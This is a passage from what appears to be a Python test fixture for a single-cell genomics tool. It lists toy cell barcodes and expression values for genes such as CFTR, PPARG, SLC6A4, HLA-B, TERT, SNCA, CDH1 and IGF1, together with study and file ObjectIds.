"FoobarAB7_BazMoo_2BACDBDDBCACABDD-1",
"FoobarAB6_BazMoo_6CACDAABBDDBCBDA-1",
"FoobarAB6_BazMoo_1DCACCBBDBBBBCBB-1",
"FoobarAB8_BazMoo_4BCABBACDAACCBCA-1",
"FoobarAB5_BazMoo_6DBCBCDABBADCCCB-1",
"FoobarAB3_BazMoo_8AAABDDBDDCBDDAB-1",
"FoobarAB5_BazMoo_2CADBCDABDDCCCBD-1",
"FoobarAB7_BazMoo_3DDCCDCCDDBBAADB-1",
"FoobarAB5_BazMoo_1DDDDBBDAADDABCB-1",
"FoobarAB5_BazMoo_8DDCCCBABCBACABB-1",
"FoobarAB6_BazMoo_4DAACBADBACABADC-1",
],
"subsample_threshold": None,
"subsample_annotation": None,
"linear_data_type": "Gene",
"study_id": ObjectId("5d276a50421aa9117c982845"),
"study_file_id": ObjectId("5dd5ae25421aa910a723a337"),
},
"CFTR Expression": {
"name": "CFTR Expression",
"cluster_name": "AB_toy_data_toy.matrix.mtx",
"array_type": "expression",
"array_index": 0,
"values": [
2.81,
2.0,
2.58,
2.32,
2.81,
3.0,
2.58,
1.0,
2.81,
2.32,
2.32,
3.0,
2.58,
1.58,
3.0,
3.0,
2.81,
2.58,
2.81,
3.0,
1.0,
3.0,
2.0,
1.58,
2.32,
2.58,
2.0,
1.0,
1.0,
1.0,
2.58,
2.58,
1.58,
1.58,
1.0,
1.58,
2.0,
2.58,
2.32,
1.0,
2.81,
2.32,
2.58,
1.0,
1.58,
2.81,
1.58,
2.0,
1.0,
],
"subsample_threshold": None,
"subsample_annotation": None,
"linear_data_type": "Gene",
"study_id": ObjectId("5d276a50421aa9117c982845"),
"study_file_id": ObjectId("5dd5ae25421aa910a723a337"),
},
"PPARG Cells": {
"name": "PPARG Cells",
"cluster_name": "AB_toy_data_toy.matrix.mtx",
"array_type": "cells",
"array_index": 0,
"values": [
"FoobarAB4_BazMoo_5ABCBACBDABBADAC-1",
"FoobarAB8_BazMoo_7ADDDBCAAAADBCAB-1",
"FoobarAB2_BazMoo_3BBCBAABCDAACADD-1",
"FoobarAB7_BazMoo_4ADBADDCDCCADBDC-1",
"FoobarAB7_BazMoo_3ADABDACCCABBCBC-1",
"FoobarAB3_BazMoo_7BDDDBCADACBDDBC-1",
"FoobarAB2_BazMoo_6ABBADACDCDDBCAC-1",
"FoobarAB6_BazMoo_3BADDCCDACDAAAAD-1",
"FoobarAB3_BazMoo_1DABABDBDCCDBCBA-1",
"FoobarAB7_BazMoo_7AADDADDDCADABDD-1",
"FoobarAB7_BazMoo_5DAACACCCDADACBB-1",
"FoobarAB8_BazMoo_3CCABBAABDCCBDCB-1",
"FoobarAB2_BazMoo_3DABAABDAAAABAAB-1",
"FoobarAB2_BazMoo_2DCDCDBCBABDBBAD-1",
"FoobarAB4_BazMoo_2BBDBCACBADBDDBA-1",
"FoobarAB3_BazMoo_7BCABDBCDBABBCBA-1",
"FoobarAB6_BazMoo_8CBADCCBAAABBCBA-1",
"FoobarAB2_BazMoo_7DCAAACADCCADBAD-1",
"FoobarAB8_BazMoo_4BADABCDBDBDACAB-1",
"FoobarAB1_BazMoo_6ABAAADABDACDDDA-1",
"FoobarAB2_BazMoo_1DDDBDCCBCBCACAA-1",
"FoobarAB1_BazMoo_1DADCCBAAACBDABC-1",
"FoobarAB4_BazMoo_8DCDBDACADABCDDB-1",
"FoobarAB5_BazMoo_3BADAABBDABABDAC-1",
"FoobarAB8_BazMoo_6BCCBDBADAABDCCD-1",
"FoobarAB3_BazMoo_2CDDDCADDBDBDABB-1",
"FoobarAB6_BazMoo_2CCACBBAAACCAACA-1",
"FoobarAB5_BazMoo_1DCBBBBDACADABAA-1",
"FoobarAB1_BazMoo_7BDCABCBDAADCBBA-1",
"FoobarAB6_BazMoo_3DBACDBDAAADABDB-1",
"FoobarAB8_BazMoo_6DBAADCBDADCCDDB-1",
"FoobarAB8_BazMoo_7DADCDCBCDDBDDDA-1",
"FoobarAB7_BazMoo_2BACDBDDBCACABDD-1",
"FoobarAB1_BazMoo_4CBCCBADBAABDDBB-1",
"FoobarAB4_BazMoo_7CBDDABDBBDCBDBB-1",
"FoobarAB3_BazMoo_2ADDBAAACCDDDDAA-1",
"FoobarAB4_BazMoo_6ADADABCCDDBDACC-1",
"FoobarAB2_BazMoo_1CABADDBCABBCBBA-1",
"FoobarAB3_BazMoo_3DABBDCBDACACCCC-1",
"FoobarAB3_BazMoo_6DDAABBCDBABACAA-1",
"FoobarAB5_BazMoo_6DBCBCDABBADCCCB-1",
"FoobarAB7_BazMoo_2ACCDBBADCDCACAB-1",
"FoobarAB8_BazMoo_7DCADDBDCBABCBCA-1",
"FoobarAB7_BazMoo_3DDCCDCCDDBBAADB-1",
"FoobarAB3_BazMoo_3BBCCDBADBABBDCA-1",
"FoobarAB3_BazMoo_8BDCBCBDCABACCCB-1",
"FoobarAB8_BazMoo_6BDCBAACCCADDABB-1",
],
"subsample_threshold": None,
"subsample_annotation": None,
"linear_data_type": "Gene",
"study_id": ObjectId("5d276a50421aa9117c982845"),
"study_file_id": ObjectId("5dd5ae25421aa910a723a337"),
},
"PPARG Expression": {
"name": "PPARG Expression",
"cluster_name": "AB_toy_data_toy.matrix.mtx",
"array_type": "expression",
"array_index": 0,
"values": [
2.32,
2.81,
2.81,
1.58,
2.0,
2.81,
2.0,
2.0,
1.0,
2.58,
1.58,
2.0,
2.32,
2.81,
3.0,
1.58,
2.0,
3.0,
3.0,
2.32,
2.81,
2.81,
1.58,
2.0,
1.58,
3.0,
1.0,
1.0,
1.0,
2.58,
1.58,
2.81,
3.0,
2.58,
1.0,
2.32,
2.81,
2.81,
3.0,
1.58,
1.58,
2.58,
2.81,
2.32,
1.58,
3.0,
2.0,
],
"subsample_threshold": None,
"subsample_annotation": None,
"linear_data_type": "Gene",
"study_id": ObjectId("5d276a50421aa9117c982845"),
"study_file_id": ObjectId("5dd5ae25421aa910a723a337"),
},
"SLC6A4 Cells": {
"name": "SLC6A4 Cells",
"cluster_name": "AB_toy_data_toy.matrix.mtx",
"array_type": "cells",
"array_index": 0,
"values": [
"FoobarAB2_BazMoo_3BBCBAABCDAACADD-1",
"FoobarAB5_BazMoo_7DCACDAACCACBBBD-1",
"FoobarAB7_BazMoo_1DBAACCBDDDCBCDB-1",
"FoobarAB3_BazMoo_1DABABDBDCCDBCBA-1",
"FoobarAB2_BazMoo_4AACCAACBCBAACDD-1",
"FoobarAB7_BazMoo_5BADDCDBCDDBCDAA-1",
"FoobarAB6_BazMoo_3CDCABAAADCACCBA-1",
"FoobarAB3_BazMoo_7DCACACACDCADCBD-1",
"FoobarAB8_BazMoo_6BABCBBCDBBCACDD-1",
"FoobarAB1_BazMoo_8DCCDCBDADCCAACD-1",
"FoobarAB7_BazMoo_5CBDCCDBCDBCDCCC-1",
"FoobarAB5_BazMoo_1CBDCADACACCBCAD-1",
"FoobarAB1_BazMoo_5DDADDBCDDDCDABB-1",
"FoobarAB7_BazMoo_6CBBDBBCBCBDABAA-1",
"FoobarAB3_BazMoo_7BADDADDCCAACCCB-1",
"FoobarAB2_BazMoo_4CADDDCAADAADCAB-1",
"FoobarAB2_BazMoo_1DDBAACABBACBDCA-1",
"FoobarAB3_BazMoo_1CCCCDBADDDDDAAB-1",
"FoobarAB1_BazMoo_6ABAAADABDACDDDA-1",
"FoobarAB2_BazMoo_8CCDBBDCCBBACDCB-1",
"FoobarAB2_BazMoo_1DDDBDCCBCBCACAA-1",
"FoobarAB4_BazMoo_6DDACDDBBBAADBCC-1",
"FoobarAB3_BazMoo_2CDDCABDDCCACCBA-1",
"FoobarAB7_BazMoo_8DCBDADACBABCCCC-1",
"FoobarAB5_BazMoo_7AAABBCDCACCABAB-1",
"FoobarAB2_BazMoo_4ACDCCACDDBADADC-1",
"FoobarAB7_BazMoo_8DCBCBBACADBBBAC-1",
"FoobarAB2_BazMoo_7CDBDADBACBAAAAC-1",
"FoobarAB3_BazMoo_8BCDBDDBDBDBDCBC-1",
"FoobarAB1_BazMoo_8CBBADABBCDAAAAA-1",
"FoobarAB4_BazMoo_7DDBDCACBACDBAAC-1",
"FoobarAB2_BazMoo_6BACDBCDDCCDADAB-1",
"FoobarAB8_BazMoo_5CBBCCCADADDADDD-1",
"FoobarAB3_BazMoo_2DBCBBDABAADBDCD-1",
"FoobarAB7_BazMoo_1BABADDCCBAAACBC-1",
"FoobarAB2_BazMoo_6BBDBDACBDBAACBA-1",
"FoobarAB4_BazMoo_1DCDCCCDBDBBABBB-1",
"FoobarAB1_BazMoo_5DADBADCDDCBDAAB-1",
"FoobarAB5_BazMoo_2ACDDDDADBCDDDCA-1",
"FoobarAB4_BazMoo_2DDCCACACDBBACCC-1",
"FoobarAB5_BazMoo_8BACBBADCBDDBDAA-1",
"FoobarAB8_BazMoo_1CBBCDBACADDAABB-1",
"FoobarAB1_BazMoo_8DDCCAABADABCACC-1",
"FoobarAB2_BazMoo_5DBCDDBABCAAADDB-1",
"FoobarAB8_BazMoo_2CADDACABACDAADD-1",
"FoobarAB1_BazMoo_4DDDCDCCABBDDABD-1",
"FoobarAB7_BazMoo_5DCDDDDABACBDACA-1",
"FoobarAB5_BazMoo_2CADBCDABDDCCCBD-1",
"FoobarAB1_BazMoo_2BDDDCADCACDDCBB-1",
"FoobarAB7_BazMoo_3DDCCDCCDDBBAADB-1",
"FoobarAB3_BazMoo_3BBCCDBADBABBDCA-1",
],
"subsample_threshold": None,
"subsample_annotation": None,
"linear_data_type": "Gene",
"study_id": ObjectId("5d276a50421aa9117c982845"),
"study_file_id": ObjectId("5dd5ae25421aa910a723a337"),
},
"SLC6A4 Expression": {
"name": "SLC6A4 Expression",
"cluster_name": "AB_toy_data_toy.matrix.mtx",
"array_type": "expression",
"array_index": 0,
"values": [
2.81,
2.81,
1.58,
3.0,
2.0,
2.0,
2.58,
3.0,
1.58,
1.0,
1.0,
1.58,
3.0,
2.58,
1.58,
3.0,
3.0,
2.58,
1.0,
2.32,
1.0,
1.58,
2.58,
1.0,
2.81,
1.0,
1.58,
2.81,
3.0,
1.58,
3.0,
2.0,
3.0,
2.32,
2.32,
1.0,
2.58,
2.81,
3.0,
1.58,
1.0,
2.81,
2.0,
2.32,
3.0,
1.58,
2.0,
1.0,
3.0,
1.0,
3.0,
],
"subsample_threshold": None,
"subsample_annotation": None,
"linear_data_type": "Gene",
"study_id": ObjectId("5d276a50421aa9117c982845"),
"study_file_id": ObjectId("5dd5ae25421aa910a723a337"),
},
"HLA-B Cells": {
"name": "HLA-B Cells",
"cluster_name": "AB_toy_data_toy.matrix.mtx",
"array_type": "cells",
"array_index": 0,
"values": [
"FoobarAB3_BazMoo_6AACDDCDACBCBACD-1",
"FoobarAB6_BazMoo_1ABAADCDCBDDACAB-1",
"FoobarAB3_BazMoo_8ADDBCBACDCCACCD-1",
"FoobarAB6_BazMoo_3BADDCCDACDAAAAD-1",
"FoobarAB7_BazMoo_7AADDADDDCADABDD-1",
"FoobarAB4_BazMoo_3ABCCABBCCCCBCDB-1",
"FoobarAB2_BazMoo_4DDCDADBBCDBAABB-1",
"FoobarAB4_BazMoo_6CADCBCCBCDACDBD-1",
"FoobarAB5_BazMoo_1CACBDACACDDCCDD-1",
"FoobarAB2_BazMoo_3DABAABDAAAABAAB-1",
"FoobarAB1_BazMoo_8CDCBDACDAAACBBD-1",
"FoobarAB8_BazMoo_4CBABCDBBDBCBCCA-1",
"FoobarAB7_BazMoo_3ACBCBCACACDBADD-1",
"FoobarAB8_BazMoo_6BABCBBCDBBCACDD-1",
"FoobarAB7_BazMoo_5CCCBCDAABDBABAD-1",
"FoobarAB1_BazMoo_8DCCDCBDADCCAACD-1",
"FoobarAB7_BazMoo_5CBDCCDBCDBCDCCC-1",
"FoobarAB3_BazMoo_5CAADCDABADACAAC-1",
"FoobarAB4_BazMoo_3BBADCDAABADCAAB-1",
"FoobarAB1_BazMoo_1CDBDADAAACBAABD-1",
"FoobarAB3_BazMoo_3BDBDACADBAADCCC-1",
"FoobarAB6_BazMoo_7BDAABDCAADADBBA-1",
"FoobarAB8_BazMoo_8DCDABCAADDBAABC-1",
"FoobarAB6_BazMoo_4DBCDDCADAACCCDD-1",
"FoobarAB4_BazMoo_1ABABBCCADCADBAB-1",
"FoobarAB1_BazMoo_6ABAAADABDACDDDA-1",
"FoobarAB8_BazMoo_4BDDDDBCBCAABDDD-1",
"FoobarAB7_BazMoo_4DDDDDBCCCBBADBD-1",
"FoobarAB2_BazMoo_1DDDBDCCBCBCACAA-1",
"FoobarAB1_BazMoo_1BCCBCAADCCADCDB-1",
"FoobarAB7_BazMoo_8DCBDADACBABCCCC-1",
"FoobarAB3_BazMoo_5ACABCDCBDAAACAD-1",
"FoobarAB5_BazMoo_7AAABBCDCACCABAB-1",
"FoobarAB3_BazMoo_1DBADBBCAACCBDDC-1",
"FoobarAB2_BazMoo_8DBCDDCCAACDDDCB-1",
"FoobarAB2_BazMoo_4ACDCCACDDBADADC-1",
"FoobarAB6_BazMoo_1BCDADDDABDDBCDA-1",
"FoobarAB4_BazMoo_1BCDCDADBDBCBDAD-1",
"FoobarAB2_BazMoo_1ACCDADBABBACBCA-1",
"FoobarAB7_BazMoo_7ACADCDBAABAACBD-1",
"FoobarAB1_BazMoo_8CBBADABBCDAAAAA-1",
"FoobarAB2_BazMoo_2DABDDCDADBBDDBD-1",
"FoobarAB2_BazMoo_8CCACCBDCBCDABAD-1",
"FoobarAB4_BazMoo_7DDBDCACBACDBAAC-1",
"FoobarAB6_BazMoo_3DBACDBDAAADABDB-1",
"FoobarAB3_BazMoo_4CACCAABBDCDBACD-1",
"FoobarAB6_BazMoo_1BDCADABBAACBCCD-1",
"FoobarAB7_BazMoo_5DBABDCBDCBADBCA-1",
"FoobarAB8_BazMoo_3DACBBDDBABDDDDD-1",
"FoobarAB2_BazMoo_6BBDBDACBDBAACBA-1",
"FoobarAB1_BazMoo_5DADBADCDDCBDAAB-1",
"FoobarAB3_BazMoo_2CACAABACDBCBCBA-1",
"FoobarAB3_BazMoo_2DACDBDCAAAAACBB-1",
"FoobarAB5_BazMoo_6ABBBBCBCBCBBCAB-1",
"FoobarAB7_BazMoo_2BACDBDDBCACABDD-1",
"FoobarAB1_BazMoo_8DDCCAABADABCACC-1",
"FoobarAB7_BazMoo_1CADCBBCDCBDDDDD-1",
"FoobarAB5_BazMoo_7BAACDCDCBCBBACA-1",
"FoobarAB7_BazMoo_5DCDDDDABACBDACA-1",
"FoobarAB2_BazMoo_7DABDADBDBADACDB-1",
"FoobarAB1_BazMoo_2BDDDCADCACDDCBB-1",
"FoobarAB7_BazMoo_7BCABCCCACBAADDC-1",
"FoobarAB8_BazMoo_6BDCBAACCCADDABB-1",
],
"subsample_threshold": None,
"subsample_annotation": None,
"linear_data_type": "Gene",
"study_id": ObjectId("5d276a50421aa9117c982845"),
"study_file_id": ObjectId("5dd5ae25421aa910a723a337"),
},
"HLA-B Expression": {
"name": "HLA-B Expression",
"cluster_name": "AB_toy_data_toy.matrix.mtx",
"array_type": "expression",
"array_index": 0,
"values": [
1.58,
2.0,
2.32,
2.81,
3.0,
1.0,
3.0,
1.58,
2.0,
1.0,
2.81,
2.58,
2.58,
1.0,
1.58,
2.0,
2.32,
3.0,
2.0,
2.81,
3.0,
2.0,
3.0,
2.81,
1.58,
3.0,
2.0,
2.32,
3.0,
2.0,
3.0,
2.58,
2.0,
2.81,
2.58,
2.32,
1.0,
2.81,
2.58,
2.81,
2.32,
2.81,
3.0,
2.32,
3.0,
2.58,
1.58,
2.0,
3.0,
1.0,
1.0,
2.58,
2.0,
3.0,
2.58,
1.0,
1.58,
2.58,
3.0,
2.32,
2.58,
3.0,
2.0,
],
"subsample_threshold": None,
"subsample_annotation": None,
"linear_data_type": "Gene",
"study_id": ObjectId("5d276a50421aa9117c982845"),
"study_file_id": ObjectId("5dd5ae25421aa910a723a337"),
},
"TERT Cells": {
"name": "TERT Cells",
"cluster_name": "AB_toy_data_toy.matrix.mtx",
"array_type": "cells",
"array_index": 0,
"values": [
"FoobarAB6_BazMoo_2ACBDBBABABABACC-1",
"FoobarAB3_BazMoo_8BABABDBACACACCD-1",
"FoobarAB7_BazMoo_4DDBADDACABDABDD-1",
"FoobarAB4_BazMoo_3ABCCABBCCCCBCDB-1",
"FoobarAB8_BazMoo_4CDBCDACADDDCABA-1",
"FoobarAB5_BazMoo_8DCCCBAABDDBDDDA-1",
"FoobarAB3_BazMoo_7DCACACACDCADCBD-1",
"FoobarAB3_BazMoo_2DACADABBDACCBDC-1",
"FoobarAB5_BazMoo_3CBDBBABBAACABCD-1",
"FoobarAB5_BazMoo_1CBDCADACACCBCAD-1",
"FoobarAB4_BazMoo_2BBDBCACBADBDDBA-1",
"FoobarAB1_BazMoo_5DDADDBCDDDCDABB-1",
"FoobarAB7_BazMoo_6CBBDBBCBCBDABAA-1",
"FoobarAB8_BazMoo_1CBADADCCCCACAAC-1",
"FoobarAB1_BazMoo_3BCBBBCBCDDCBDAB-1",
"FoobarAB3_BazMoo_7BCABDBCDBABBCBA-1",
"FoobarAB2_BazMoo_4CADDDCAADAADCAB-1",
"FoobarAB5_BazMoo_6AABBDADDABCDDCD-1",
"FoobarAB6_BazMoo_4DBCDDBAAAACAADC-1",
"FoobarAB6_BazMoo_4DBCDDCADAACCCDD-1",
"FoobarAB8_BazMoo_2CACAACCDBBBBBBB-1",
"FoobarAB8_BazMoo_4BDDDDBCBCAABDDD-1",
"FoobarAB3_BazMoo_1DBABCBBAABBABBB-1",
"FoobarAB2_BazMoo_1DDDBDCCBCBCACAA-1",
"FoobarAB7_BazMoo_3ADCADABBCDBBDDC-1",
"FoobarAB1_BazMoo_6BADACADACADCDDD-1",
"FoobarAB1_BazMoo_1DACACBDDADCCACC-1",
"FoobarAB2_BazMoo_1CABCCCACABCCACA-1",
"FoobarAB2_BazMoo_5BCBDBBBDADCBDAC-1",
"FoobarAB4_BazMoo_7DDBDCACBACDBAAC-1",
"FoobarAB3_BazMoo_6BACBCBCDAADDDAC-1",
"FoobarAB5_BazMoo_4BBDDDADCAADDDBB-1",
"FoobarAB8_BazMoo_6DBAADCBDADCCDDB-1",
"FoobarAB3_BazMoo_2DBCBBDABAADBDCD-1",
"FoobarAB3_BazMoo_2DACDBDCAAAAACBB-1",
"FoobarAB4_BazMoo_2DDCCACACDBBACCC-1",
"FoobarAB8_BazMoo_7DADCDCBCDDBDDDA-1",
"FoobarAB1_BazMoo_4CBCCBADBAABDDBB-1",
"FoobarAB2_BazMoo_5ADDADBBABBDCCAC-1",
"FoobarAB1_BazMoo_8CBDADBABACDADAC-1",
"FoobarAB7_BazMoo_1BBADABCABACDADC-1",
"FoobarAB4_BazMoo_1CCACCABBBDABDCB-1",
"FoobarAB3_BazMoo_3DABBDCBDACACCCC-1",
"FoobarAB8_BazMoo_2CADDACABACDAADD-1",
"FoobarAB1_BazMoo_2BDDDCADCACDDCBB-1",
"FoobarAB5_BazMoo_8DDCCCBABCBACABB-1",
"FoobarAB8_BazMoo_5CBCADBCADABBCAB-1",
"FoobarAB3_BazMoo_5DDBDBBBCBDBBBCD-1",
],
"subsample_threshold": None,
"subsample_annotation": None,
"linear_data_type": "Gene",
"study_id": ObjectId("5d276a50421aa9117c982845"),
"study_file_id": ObjectId("5dd5ae25421aa910a723a337"),
},
"TERT Expression": {
"name": "TERT Expression",
"cluster_name": "AB_toy_data_toy.matrix.mtx",
"array_type": "expression",
"array_index": 0,
"values": [
2.81,
3.0,
2.0,
2.32,
2.81,
2.32,
1.0,
1.0,
2.58,
1.58,
2.81,
2.32,
1.58,
1.58,
1.0,
1.0,
2.81,
1.0,
2.0,
1.58,
2.0,
1.58,
1.58,
2.32,
2.32,
2.32,
3.0,
2.58,
2.0,
3.0,
3.0,
1.58,
2.58,
2.32,
3.0,
1.58,
2.58,
2.0,
1.58,
2.58,
2.0,
2.0,
2.32,
2.32,
2.58,
3.0,
2.32,
3.0,
],
"subsample_threshold": None,
"subsample_annotation": None,
"linear_data_type": "Gene",
"study_id": ObjectId("5d276a50421aa9117c982845"),
"study_file_id": ObjectId("5dd5ae25421aa910a723a337"),
},
"SNCA Cells": {
"name": "SNCA Cells",
"cluster_name": "AB_toy_data_toy.matrix.mtx",
"array_type": "cells",
"array_index": 0,
"values": [
"FoobarAB8_BazMoo_1BDACCDCCBBADBCB-1",
"FoobarAB2_BazMoo_7DBCCABABACABBBD-1",
"FoobarAB3_BazMoo_8BABABDBACACACCD-1",
"FoobarAB8_BazMoo_8CCBAADAAACCBDAD-1",
"FoobarAB4_BazMoo_3ABCCABBCCCCBCDB-1",
"FoobarAB7_BazMoo_2CADCDBBDBBDDCBA-1",
"FoobarAB5_BazMoo_3CBBBDBACDBABBCA-1",
"FoobarAB7_BazMoo_6ABADABDAABBCDDB-1",
"FoobarAB7_BazMoo_4ABDBBBACBCCBDAA-1",
"FoobarAB6_BazMoo_3CDCABAAADCACCBA-1",
"FoobarAB2_BazMoo_3BBDDCADCDACDABD-1",
"FoobarAB5_BazMoo_4CDCACCCBDBADABB-1",
"FoobarAB8_BazMoo_6BABCBBCDBBCACDD-1",
"FoobarAB8_BazMoo_5CDDADACBAAACBAA-1",
"FoobarAB1_BazMoo_1CDBDADAAACBAABD-1",
"FoobarAB7_BazMoo_4CDBBCDDDDAADCDC-1",
"FoobarAB8_BazMoo_7DDBCBACABDABBAA-1",
"FoobarAB3_BazMoo_1CCCCDBADDDDDAAB-1",
"FoobarAB6_BazMoo_4DACBDDDBDBDCADC-1",
"FoobarAB1_BazMoo_3DBBCDAABDACBCBB-1",
"FoobarAB3_BazMoo_1DBABCBBAABBABBB-1",
"FoobarAB4_BazMoo_8DCDBDACADABCDDB-1",
"FoobarAB4_BazMoo_6DDACDDBBBAADBCC-1",
"FoobarAB3_BazMoo_2CDDCABDDCCACCBA-1",
"FoobarAB7_BazMoo_3ADCADABBCDBBDDC-1",
"FoobarAB5_BazMoo_3BADAABBDABABDAC-1",
"FoobarAB2_BazMoo_1ABCCACACBBBCDBA-1",
"FoobarAB3_BazMoo_2CDDDCADDBDBDABB-1",
"FoobarAB6_BazMoo_2CCACBBAAACCAACA-1",
"FoobarAB1_BazMoo_8CBBADABBCDAAAAA-1",
"FoobarAB5_BazMoo_8BCCCDBABCCADCAB-1",
"FoobarAB7_BazMoo_2BCBBBBCBCAAABDD-1",
"FoobarAB3_BazMoo_5ABDCBBDCDCACABB-1",
"FoobarAB5_BazMoo_1DCBBBBDACADABAA-1",
"FoobarAB2_BazMoo_5BCBDBBBDADCBDAC-1",
"FoobarAB1_BazMoo_3BBCCABDADCDBCCB-1",
"FoobarAB4_BazMoo_7DDBDCACBACDBAAC-1",
"FoobarAB3_BazMoo_4CABACABDCCCADCA-1",
"FoobarAB2_BazMoo_6BBDBDACBDBAACBA-1",
"FoobarAB1_BazMoo_5DADBADCDDCBDAAB-1",
"FoobarAB3_BazMoo_2DACDBDCAAAAACBB-1",
"FoobarAB8_BazMoo_6DADBACAAACBDDAA-1",
"FoobarAB5_BazMoo_6ABBBBCBCBCBBCAB-1",
"FoobarAB5_BazMoo_8BACBBADCBDDBDAA-1",
"FoobarAB1_BazMoo_5AABDACBCCBCABDD-1",
"FoobarAB5_BazMoo_3DDACADDCAADCABB-1",
"FoobarAB6_BazMoo_1DBBAADCDAADBCDC-1",
"FoobarAB1_BazMoo_4DDDCDCCABBDDABD-1",
"FoobarAB7_BazMoo_2ACCDBBADCDCACAB-1",
"FoobarAB3_BazMoo_5DDBDBBBCBDBBBCD-1",
"FoobarAB6_BazMoo_4DAACBADBACABADC-1",
"FoobarAB8_BazMoo_6BDCBAACCCADDABB-1",
"FoobarAB2_BazMoo_3BCDCBCCBCCCCBAC-1",
],
"subsample_threshold": None,
"subsample_annotation": None,
"linear_data_type": "Gene",
"study_id": ObjectId("5d276a50421aa9117c982845"),
"study_file_id": ObjectId("5dd5ae25421aa910a723a337"),
},
"SNCA Expression": {
"name": "SNCA Expression",
"cluster_name": "AB_toy_data_toy.matrix.mtx",
"array_type": "expression",
"array_index": 0,
"values": [
1.0,
2.81,
2.32,
2.32,
3.0,
2.58,
2.58,
2.81,
3.0,
1.58,
2.58,
2.0,
2.58,
2.0,
2.58,
1.58,
2.81,
2.32,
1.0,
1.0,
1.0,
1.58,
3.0,
2.58,
2.58,
3.0,
2.81,
2.32,
2.58,
1.58,
2.81,
2.0,
3.0,
2.0,
2.0,
2.0,
2.0,
2.32,
2.81,
1.58,
1.58,
1.0,
2.0,
2.81,
2.81,
3.0,
1.0,
2.81,
1.58,
1.0,
2.58,
1.0,
1.58,
],
"subsample_threshold": None,
"subsample_annotation": None,
"linear_data_type": "Gene",
"study_id": ObjectId("5d276a50421aa9117c982845"),
"study_file_id": ObjectId("5dd5ae25421aa910a723a337"),
},
"CDH1 Cells": {
"name": "CDH1 Cells",
"cluster_name": "AB_toy_data_toy.matrix.mtx",
"array_type": "cells",
"array_index": 0,
"values": [
"FoobarAB3_BazMoo_8BABABDBACACACCD-1",
"FoobarAB1_BazMoo_1BBDDDBDADDCACAB-1",
"FoobarAB7_BazMoo_4ADBADDCDCCADBDC-1",
"FoobarAB8_BazMoo_4BDABCDCCBABACCC-1",
"FoobarAB4_BazMoo_8DBCCDADBCBBCBDD-1",
"FoobarAB2_BazMoo_6ABBADACDCDDBCAC-1",
"FoobarAB7_BazMoo_4DDBADDACABDABDD-1",
"FoobarAB3_BazMoo_1DABABDBDCCDBCBA-1",
"FoobarAB8_BazMoo_4CDBCDACADDDCABA-1",
"FoobarAB5_BazMoo_8DCCCBAABDDBDDDA-1",
"FoobarAB6_BazMoo_1ACCBABCADDCBAAC-1",
"FoobarAB5_BazMoo_3DADDDCACDABCDCB-1",
"FoobarAB5_BazMoo_3CBBBDBACDBABBCA-1",
"FoobarAB2_BazMoo_1AADDCCADACBADAD-1",
"FoobarAB7_BazMoo_5DAACACCCDADACBB-1",
"FoobarAB7_BazMoo_4ABDBBBACBCCBDAA-1",
"FoobarAB4_BazMoo_6CADCBCCBCDACDBD-1",
"FoobarAB5_BazMoo_1CACBDACACDDCCDD-1",
"FoobarAB8_BazMoo_7CCACACCBDDBBCBB-1",
"FoobarAB8_BazMoo_3CCABBAABDCCBDCB-1",
"FoobarAB1_BazMoo_3DCABADBDAADDCBD-1",
"FoobarAB3_BazMoo_3CBBDAAACACCDDDA-1",
"FoobarAB7_BazMoo_5CCCBCDAABDBABAD-1",
"FoobarAB3_BazMoo_5CAADCDABADACAAC-1",
"FoobarAB8_BazMoo_8ADAABACBACDDCAB-1",
"FoobarAB3_BazMoo_5DAAABCBCADBBCCC-1",
"FoobarAB8_BazMoo_8DCDABCAADDBAABC-1",
"FoobarAB4_BazMoo_1ABABBCCADCADBAB-1",
"FoobarAB2_BazMoo_7DCAAACADCCADBAD-1",
"FoobarAB4_BazMoo_6DDACDDBBBAADBCC-1",
"FoobarAB3_BazMoo_2CDDCABDDCCACCBA-1",
"FoobarAB2_BazMoo_4ACDCCACDDBADADC-1",
"FoobarAB5_BazMoo_6BCBABACCCDACDBB-1",
"FoobarAB2_BazMoo_1ACCDADBABBACBCA-1",
"FoobarAB6_BazMoo_2CCACBBAAACCAACA-1",
"FoobarAB7_BazMoo_2BCBBBBCBCAAABDD-1",
"FoobarAB4_BazMoo_6ABCCABADCCDBCAA-1",
"FoobarAB6_BazMoo_1BDCADABBAACBCCD-1",
"FoobarAB7_BazMoo_5DBABDCBDCBADBCA-1",
"FoobarAB4_BazMoo_4CCCDAAACCACABBC-1",
"FoobarAB2_BazMoo_6BBDBDACBDBAACBA-1",
"FoobarAB5_BazMoo_2ACDDDDADBCDDDCA-1",
"FoobarAB8_BazMoo_7DADCDCBCDDBDDDA-1",
"FoobarAB6_BazMoo_6CACDAABBDDBCBDA-1",
"FoobarAB4_BazMoo_7CBDDABDBBDCBDBB-1",
"FoobarAB5_BazMoo_3DDACADDCAADCABB-1",
"FoobarAB7_BazMoo_1CADCBBCDCBDDDDD-1",
"FoobarAB8_BazMoo_2CADDACABACDAADD-1",
"FoobarAB2_BazMoo_1CCCBADCABBDBDAC-1",
"FoobarAB3_BazMoo_8AAABDDBDDCBDDAB-1",
"FoobarAB2_BazMoo_7DABDADBDBADACDB-1",
"FoobarAB7_BazMoo_7BCABCCCACBAADDC-1",
],
"subsample_threshold": None,
"subsample_annotation": None,
"linear_data_type": "Gene",
"study_id": ObjectId("5d276a50421aa9117c982845"),
"study_file_id": ObjectId("5dd5ae25421aa910a723a337"),
},
"CDH1 Expression": {
"name": "CDH1 Expression",
"cluster_name": "AB_toy_data_toy.matrix.mtx",
"array_type": "expression",
"array_index": 0,
"values": [
2.58,
2.0,
2.81,
2.58,
1.58,
2.81,
1.58,
1.58,
2.58,
1.58,
2.32,
2.58,
2.81,
2.0,
2.32,
2.81,
2.0,
1.0,
1.0,
1.0,
1.0,
1.0,
3.0,
2.0,
1.58,
2.32,
2.0,
2.81,
2.32,
1.0,
2.0,
1.58,
2.81,
1.0,
2.81,
3.0,
3.0,
2.58,
2.58,
2.32,
2.81,
2.0,
2.58,
2.0,
3.0,
2.0,
2.58,
1.58,
2.81,
1.0,
2.58,
2.58,
],
"subsample_threshold": None,
"subsample_annotation": None,
"linear_data_type": "Gene",
"study_id": ObjectId("5d276a50421aa9117c982845"),
"study_file_id": ObjectId("5dd5ae25421aa910a723a337"),
},
"IGF1 Cells": {
"name": "IGF1 Cells",
"cluster_name": "AB_toy_data_toy.matrix.mtx",
"array_type": "cells",
"array_index": 0,
"values": [
"FoobarAB4_BazMoo_5ABCBACBDABBADAC-1",
"FoobarAB5_BazMoo_4BAABBACBDADDACA-1",
"FoobarAB8_BazMoo_8CCBAADAAACCBDAD-1",
